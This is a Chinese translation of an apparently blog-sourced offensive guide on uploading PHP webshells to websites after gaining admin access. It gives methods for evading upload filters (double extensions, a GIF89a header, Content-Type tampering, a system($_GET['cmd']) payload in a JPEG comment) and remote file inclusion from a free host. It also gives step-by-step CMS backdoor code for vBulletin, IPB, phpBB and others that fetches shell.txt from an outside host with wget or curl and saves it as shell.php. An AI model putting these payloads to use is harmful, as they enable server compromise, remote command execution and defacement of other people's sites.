李亦何

---李亦何编译

     当获得管理员访问权限/登录该网站后台管理后，许多新手在网站上传Shell时都遇到了问题. 所以，我写这篇文章是为他们做一些技术指导或帮助. 基本上说，shell使我们可以远程访问该服务器. 这样的Webshell可用不同的语言提供，例如php，asp / aspx，cgi等。因此，我们必须根据服务器脚本选择将在服务器上运行的Shell. 如果服务器支持php shell，那么我们必须选择任何php shell，否则选择asp＆cgi。 现在，让我们进入要点... 登录到站站后台管理后，如果我们在网站中找到任何上载选项，则可以轻松地上传Webshell. 但是有时我们必须做一些更改才能上传shell。


方式1
由于Webshell采用PHP格式，因此有时某些站点不允许直接使用PHP扩展名来上传此类脚本. 如果发生这种情况，则只需重命名Webshell名称. 添加.gif / .jpg / .html / .doc等。示例：假设在重命名shell名称之前是shell.php，然后将其重命名为shell.php.jpg或其他名称。


方式2
首先上传一个简单的shell程序，防病毒和防火墙无法检测到该Webshell. 然后通过自己的shell上传多功能的Webshell, 你可以在网上下载到shell程序.


方式3
服务器的少量防火墙通过检查标头来检测Webshell脚本，并且不允许我们上传Webshell程序. 因此我们可以使用"GIF89A shell脚本旁路"方法绕过它. 在记事本中打开Webshell,添加"GIF89a；" 在Webshell程序代码开始之前不加引号. 如下...
GIF89a; 取决于他们使用哪种文件验证，服务器可能会以为它是一个映像，这使服务器误以为是因为它在读取文件时会找到gif标头，并会因为它是image而确保其安全。


方式4
此方法更高级, 这仅适用于客户端过滤器，不适用于服务器端. 下载适用于Firefox的Firebug，然后编辑上传的html。
<form enctype=\"multipart/form-data\" action=\"uploader.php\" method=\"OST\"> Upload DRP File: <input name=\"Upload Saved Replay\" type=\"file\" accept=\"*.jpg\"/><br /> <input type=\"submit\" value=\"Upload File\" /> </form>
更改过滤器接受。 到*。*或将其完全删除，然后就可以上传任何类型的文件。


方式5
首先为您的firefox浏览器下载“ LIVE HTTP HEADERS”插件
1.将您的shell程序名称重命名为shell.php.jpg（或该网站支持的名称。在我的情况下，该网站仅支持jpg文件。这就是为什么我将其重命名为shell.php.jpg。）
2.打开Firefox并启动Live HTTP Headers插件，然后上传您的Shell。
3.然后，您的Live HTTP标头将类似于以下内容

liv1.jpg (87.3 KB)

28-11-2020 08:22

4.然后，单击shell.php.jpg之后，再单击“Replay”按钮.
5.然后再次打开一个新窗口，在该窗口中将有两个框，但是我们必须在第二个框上进行操作。
6.在第二个框中，将您的shell.php.jpg重命名为shell.php，然后再次单击Reply按钮

liv2.jpg (123.68 KB)

28-11-2020 08:22

方式6
为自己找到edjpgcom.exe的副本“ edjpgcom是一个免费的Windows应用程序，允许您更改（或添加）JPEG文件中的JPEG注释。” 用法：-edjpgcom“ filename.jpg”现在将其添加到jpg注释中，因为由于限制等原因您将无法在其中放置整个Webshell。
“; <?php system（$_GET ['cmd']）;echo ?>
现在将您的jpg重命名为.php并上传。


方式7
您可以欺骗Web服务器以使其认为上传映像而不是php shell的另一种方法是获取Firefox并安装“ tamperdata”，然后单击“启动篡改”并上传php shell，然后篡改抓包数据并更改content-Type 从“应用程序/八位字节流”到“image/jpeg”。 如果您在使用tamperdata上传shell时遇到任何问题，则只需执行简单的Google搜索即可,网络上有很多关于此的视频教程. 因此，我不会逐步解释这一点。


方式8
当我们在网站上找到一个上传按钮时，以上所有提及的方式均有效。 但是如果没有上传按钮，则在此处上传Webshell并不容易。 我们可以尝试一些事情……我们必须找出现有php / asp / aspx页面是否存在编辑选项。 如果有编辑选项，则打开该页面并删除整个脚本。 之后，在记事本中打开Webshell。 复制脚本，粘贴到该页面。 最后，保存它。 现在，该链接将成为您的Webshell。 也许我们可以在网站的以下页面中找到编辑选项……
Contact us.php /Contact us.asp
Class.php / Class.asp
About us.php /About us.asp
Terms.php / terms.asp
注意：在某些新闻，车辆销售，购物车等网站中，通过管理控制台登录后，没有任何选择可以上传文件. 它们仅允许通过cpanel登录后上传文件。


方式9
有时，在某些远程文件包括易受攻击的站点中，我们必须从另一个主机站点执行Webshell. 方法:
1）在免费的托管站点中上传您的Webshell, www.my3gb.com www.3owl.com，www.ripway.com，www.000webhost.com等。
2）现在，假设您的带shell网站链接为: www.example.my3gb.com/c99.txt，而您的易受攻击站点为www.site.com
3）现在，我们必须执行以下命令来获得对该站点的Shell访问。 http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt
4）根据您的Webshell和受害者网站链接替换命令中的网站链接。
在joomla，wp，vb，smf，ipb，mybb SITES中上传Webshell
在上面提到的网站中，我们通常无法找到直接的上传选项。 因此，我们必须通过其他方式进行。

1.Joomla网站：
登录到adminpanel后，您会在第5号找到扩展。展开它，单击它>模板管理器>检查任何模板（如beez，ja_purity），然后单击编辑（右上侧），然后单击编辑html。现在粘贴您的Webshell 代码，然后点击保存...完成site.com/templates/模板名称/index.php，如site.com/templates/beez/index.php
2.WordPress：
登录到管理面板，展开外观，然后单击编辑器>您将找到style.css，现在在右侧选择404.php粘贴您的Webshell代码，然后单击编辑文件，您可以在site.com/wp-content/themes/theme名称中找到Webshell 你edit / 404.php
3.Vbulletin:
1-登录admin cp后台管理
2-在“插件和产品”下，选择添加新插件
3-按如下所示调整设置：产品：vBulletin Hook位置：global_start标题：（任何内容……）执行顺序：码：
ob_start（）;系统（$ _GET ['cmd']）; $ execcode = ob_get_contents（）; ob_end_clean（）;
插件处于活动状态：是
4-添加插件后，转到“样式和设计”标题，选择“样式管理器”
5-在下拉菜单中的默认样式下，选择编辑模板。
6-滚动ForumHome模型并进行扩展。单击FORUMHOME旁边的[自定义]。
7-搜索代码：
$ header在顶部附近的某个地方。替换为：代码：$ header $ execcode
8-现在进入论坛并在index.php之后添加码：
?cmd = wget http://www.site.com/shell.txt;mv shell.txt shell.php
所以看起来像代码：http: //www.site.com/pathtoforum/index.php?cmd=wget http: //www.site.com/shell.txt;mv  shell.txt shell.php
这样做是下载shell.txt，然后将其重命名为shell.php。现在，该shell必须位于shell.php论坛目录中……如果没有，则在该服务器上禁用了wget，您可以尝试其他方法：
http://www.site.com/pathtoforum/index.php?cmd=CURL http://www.site.com/shell.txt> shell.php
http://www.site.com/pathtoforum/index.php?cmd=GET http://www.site.com/shell.txt shell.php
4，SMF
登录到管理面板，您需要下载zip格式的任何smf主题并将其放入你的shell.php并保存管理面板>选择主题和布局>安装新主题>浏览并上传具有shell.php的主题之后 上传shell将找到> site.com/Themes/theme name / shell.php
5，IPB
登录管理面板>外观>管理语言，选择语言>部分（示例）public_help编辑：help.txt从列表中选择主题，或搜索主题在右侧框中添加以下代码：
$ {$ {print $ query ='cd缓存； wget http：//link_to_shell/shell.txt; mv shell.txt shell.php'}} $ {$ {system（$ query，$ out）}} $ {$ {print $ out}}
添加后，请指定到底部。现在我们继续http://www.site.com/index.php?app=core&module=help，我们添加的代码将完成，并且您将获得@Webshell, www.site.com/cache/shell.php
6.phpBB
登录到管理面板>进行样式->模板->编辑，为模板文件选择faq_body.html在以下位置：
我们增加：
fwrite（fopen（$_GET [o]，'w'），file_get_contents（$_GET ））;
并保存它。现在继续：
www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shell.txt shell在站点路径/shell.php中找到Mybb论坛登录admincp>转到模板和样式，找到默认的MyBB Theme。 然后转到模板，展开当前主题使用的模板。 查找日历模板，单击它。 点击“日历”。 在所有html代码上方，粘贴以下代码：
http://pastebin.com/9dHWmxNq
保存 shell将在site.com/calendar.php中找到
注意：如果您遇到类似“代码无法编辑的危险”的错误，则只需将您的污损代码粘贴到污损calendar.php


This artical link:  https://zer0w0rm.blogspot.com/2014/07/shell-uploading-guide.html